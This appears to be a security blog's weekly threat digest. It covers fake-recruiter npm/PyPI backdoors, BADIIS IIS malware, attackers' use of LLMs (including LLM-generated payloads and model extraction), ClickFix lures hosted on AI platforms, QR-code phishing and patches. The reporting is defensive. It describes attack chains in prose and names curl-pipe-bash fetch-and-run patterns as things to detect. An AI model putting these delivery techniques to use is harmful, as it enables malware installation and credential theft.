EvilBit Threat Digest - QR Codes, Poisoned Packages, and AI With a Side Hustle

Sunday check-in. KryptoKat called in sick, so I'm flying solo this week. Let's see how attackers are still finding new ways to punch holes in all the trust band-aids we've stuck on the internet: package registries, QR codes, AI platforms, sketchy search ads, and those forgotten IIS servers nobody wants to admit they still run.

This week isn't about shiny new zero-days. It's about distribution. Attackers are getting creative with how they deliver the same old payloads, and the blast radius just keeps getting bigger.

Supply Chain Theater: Fake Recruiters and npm/PyPI Backdoors

North Korea's Lazarus Group is back to doing what they do best: turning human ambition into initial access. In a campaign dubbed "graphalgo" by ReversingLabs, attackers posed as recruiters targeting crypto developers, ultimately pushing malicious npm and PyPI packages as part of fake "technical assessments" (Fake recruiter campaign targets crypto devs).

The flow is clean:

1. Fake recruiter reaches out via LinkedIn, Facebook, or Reddit.
2. Candidate receives a coding task hosted in attacker-controlled GitHub repos.
3. The task requires installing dependencies from attacker-controlled npm/PyPI packages.
4. Packages deploy multi-language payloads (JavaScript, Python, VBS), leading to a RAT.

The scale is notable: RL identified 192 malicious packages across both registries. One package, bigmathutils, racked up over 10,000 downloads while still benign before the attackers pushed a weaponized version. The payload chain includes token-protected C2 and behaviors aligned with prior Lazarus tradecraft, including cryptocurrency wallet targeting (yes, MetaMask again).

From a red-team perspective, this is just social engineering with a supply-chain flavor. Why waste a CVE when you can get a dev to pip install your malware for you?

For blue teams:

• Treat newly created package publishers as suspicious by default.
• Flag dev workstations reaching out to uncategorized domains shortly after package installation.
• Monitor for unusual post-install scripts in package metadata.
• Correlate recruiter outreach + repo access + dependency changes. That timeline matters.

We finally got devs to stop opening random attachments, but nobody told them to watch out for dodgy 'homework' from fake recruiters.

IIS Is Still the Internet's Basement

Elastic Security Labs dropped a new analysis on the BADIIS campaign, which has compromised over 1,800 Microsoft IIS servers globally (BADIIS to the Bone).

This isn't your typical smash-and-grab ransomware. It's SEO poisoning turned up to eleven.

Attackers (tracked as REF4033 / UAT-8099) install malicious IIS modules and services that:

• Hijack execution flow inside the web server.
• Manipulate HTTP responses
• Redirect traffic to gambling, scam, and crypto monetization sites
• Maintain persistence via rogue services and DLL side-loading

The sneaky bit: instead of dropping obvious web shells, they're hooking in at the module level. BADIIS loads directly into the IIS worker process, making it nearly indistinguishable from legitimate server activity. It inspects every incoming request, serving poisoned SEO content to search engine crawlers while showing clean pages to admins and regular visitors. Good luck spotting it unless you're looking for ghosts in the machine.

Detection opportunities:

• Unexpected global modules in applicationHost.config
• New or modified IIS services
• DLLs loaded by w3wp.exe from non-standard paths
• HTTP response anomalies that only trigger for specific referrers or user-agents (SEO fraud logic)

This campaign has been running since late 2023, with a heavy concentration in APAC (China and Vietnam account for roughly 82% of compromised servers). If you've got an IIS box nobody's watching, chances are someone's already freeloading on your bandwidth.

IIS is basically the NT 4.0 box in the closet. Nobody remembers setting it up, and everyone assumes it's someone else's problem.

AI as Co-Pilot, Not Overlord

Google's Threat Intelligence Group released a dense report on how nation-state actors are integrating LLMs into operations (GTIG AI Threat Tracker).

The headline: no AI superweapons yet. Just attackers quietly working AI into their daily grind.

Observed patterns:

• APT42, APT31, APT41 using LLMs for phishing content refinement and reconnaissance.
• AI-assisted malware development.
• Model distillation and extraction attempts targeting Gemini APIs (over 100,000 prompts in one campaign).
• Abuse of AI platform public-sharing features in "ClickFix"-style social engineering, including Gemini, ChatGPT, Copilot, DeepSeek, and Grok hosting deceptive content to deliver ATOMIC stealer on macOS.

Two notable malware families:

• HONESTCUE: A downloader/launcher framework that sends prompts to Google's Gemini API and receives dynamically generated C# source code as its second-stage payload. The code is compiled and executed entirely in memory via CSharpCodeProvider, leaving zero disk artifacts. The AI-generated payload angle is the real finding here: traditional network signatures looking for known-bad downloads won't catch it because the malicious code is generated on demand through a legitimate, encrypted API.
• COINBAIT: A credential-harvesting phishing kit masquerading as a crypto exchange, built using the AI-powered platform Lovable AI. GTIG attributes portions of the activity to UNC5356, a financially motivated cluster targeting clients of financial organizations.

Also worth mentioning: tools like Xanthorox, running on stolen API keys and abused MCP servers. Less 'Skynet,' more 'who forgot to rotate the creds?'

Operational takeaway:

AI is just making attacker workflows faster. It's not breaking the laws of physics.

Defenders should:

• Monitor anomalous LLM API usage from internal hosts.
• Watch for high-volume probing patterns that resemble model extraction.
• Alert on in-memory C# compilation events tied to suspicious network activity.
• Treat API keys like domain admin creds.

This arms race isn't about sentient AI. It's about who can automate faster and lazier.

ClickFix Goes Mac: Claude + Google Ads = Infostealer

The ClickFix technique from the GTIG section above is already being weaponized against specific platforms. A campaign reported by Moonlock Lab shows attackers abusing Claude AI's public artifact feature and Google Ads to distribute a macOS infostealer dubbed MacSync (Claude LLM artifacts abused to push Mac infostealers in ClickFix attack).

The chain:

1. Malicious Google Ad targeting queries like "online DNS resolver" or "HomeBrew."
2. Redirect to a Claude-hosted "artifact" page presenting fake troubleshooting instructions.
3. Social engineering instructs the user to execute a base64-encoded terminal command.
4. Command fetches and runs a loader for the MacSync infostealer.

Sound familiar? It's the same old ClickFix move: convince users to copy-paste random commands into a terminal because they think it'll magically fix their problem. Claude is one of several AI platforms being abused this way; Moonlock Lab and AdGuard observed over 15,000 users exposed across variants.

MacSync reportedly targets:

• Keychain credentials
• Browser-stored data
• Crypto wallet artifacts

The clever part isn't the malware; it's abusing the platform. Host your instructions on a legit AI service and you get all the trust, none of the basic URL filtering.

Blue teams should:

• Track command execution spawned shortly after browser activity involving AI platforms.
• Monitor for unusual curl-pipe-bash execution patterns.
• Treat "sponsored search result" traffic as a potential initial access vector in telemetry.

Search ads are still the world's best malware CDN, just with shinier logos.

Quishing: QR Codes as Phishing Infrastructure

Palo Alto Networks Unit 42 detailed ongoing "quishing" campaigns leveraging QR codes to bridge email, web, and mobile phishing flows (Phishing on the Edge of the Web and Mobile Using QR Codes).

Why QR codes work:

• They bypass secure email gateways that can't easily inspect embedded images.
• They shift execution to mobile devices, often outside enterprise monitoring.
• They obscure URLs behind user-initiated scans.

Observed tactics include:

• URL shorteners to add another obfuscation layer.
• In-app deep links to steal account credentials and hijack apps.
• Direct APK downloads that bypass app store security for Android users.

Unit 42's telemetry shows an average of over 11,000 detections of malicious QR codes per day. The real trick is the cross-device move. Your SOC might catch the email, but it'll never see what happens when someone scans that QR code on their phone.

Key mitigations:

• Mobile device telemetry integration into SOC workflows.
• Remind users: QR codes are just URLs in disguise, not some kind of magic square that makes things safe.
• Blocking newly registered domains referenced in QR-based campaigns.

We finally got users to stop clicking sketchy links, so attackers just turned links into QR code geometry instead.

Patch Roundup: Linux Updates and a Chrome Zero-Day

Chrome Zero-Day: CVE-2026-2441

Google patched CVE-2026-2441 on Friday, a high-severity CSS use-after-free vulnerability in Chrome that is under active exploitation in the wild. If you haven't pushed the update yet, do it Monday morning. No excuses.

Linux Patch Wave: Nessus Plugin Updates

Tenable pushed extensive Nessus plugin updates across two releases this week, covering 12 February and 14 February (Nessus plugin updates).

Key CVEs highlighted include:

• CVE-2026-26269 (Vim stack buffer overflow in NetBeans integration)
• CVE-2026-23112
• CVE-2026-2327 (markdown-it ReDoS)

Affected ecosystems span:

• Ubuntu 22.04/24.04/25.10
• SUSE Linux Enterprise 11/15
• openSUSE 15
• VMware Photon OS 5.0
• HAProxy
• OpenSSL
• Linux kernel components

Impact ranges from denial-of-service to privilege escalation and potential remote code execution, depending on the package and configuration.

No flashy worms this time. Just the usual background noise: memory corruption, logic bugs, and service weaknesses that red teams love to chain together for fun and profit.

If your patching schedule is 'quarterly-ish,' congrats. You're basically making a donation to the attacker fund.

Closing Thought

Nothing this week required a groundbreaking exploit.

Instead, attackers leaned on human trust (recruiters, QR codes, ads), platform trust (AI artifacts, npm, PyPI), and legacy infrastructure (IIS, Linux services).

The real story isn't about fancy exploits. It's about leverage: who can get the most bang for their buck.

Back in 1995, it was buffer overflows in CGI scripts. Now it's QR codes in emails leading to fake AI troubleshooting pages that trick devs into installing sketchy Python packages. Progress?

Same old playbook. Just shinier props.

Patch your servers. Audit your dependencies. Rotate your API keys. And seriously, don't run random code just because someone waves a job offer in your face.

~ UncleSp1d3r (temporary KryptoKat stand-in)